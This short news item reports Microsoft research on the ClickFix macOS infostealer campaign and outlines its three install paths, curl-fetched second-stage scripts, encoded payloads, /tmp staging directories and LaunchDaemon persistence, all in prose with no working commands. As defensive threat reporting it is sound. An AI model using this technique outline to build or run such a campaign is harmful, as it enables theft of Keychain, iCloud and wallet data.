MICROSOFT researchers are observing a multi-faceted infostealer campaign targeting macOS users, branded as ClickFix and distributed via fake macOS utilities and guides on blog sites and content platforms. In this iteration, threat actors instruct users to run Terminal commands that fetch and execute remote content, then load an AppleScript or Bash loader to deploy the malware, which can exfiltrate data such as media, iCloud data, Keychain entries, and cryptocurrency wallets.
The campaign has three execution paths: a loader install campaign, a script install campaign, and a helper install campaign, with data staging directories named using random IDs like /tmp/shub_<random ID>/ and /tmp/<random ID>. Since February 2026, a loader-based approach uses curl to retrieve a second-stage shell script, while the script install campaign deliveries shell-encoded payloads via Terminal and decouples payloads from disk.
In the helper campaign, first-stage scripts fetch Mach-O executables from attacker infrastructure and install persistence through LaunchDaemons and LaunchAgents, enabling long-term remote control. According to Microsoft Defender Security Research Team and Microsoft Defender Experts.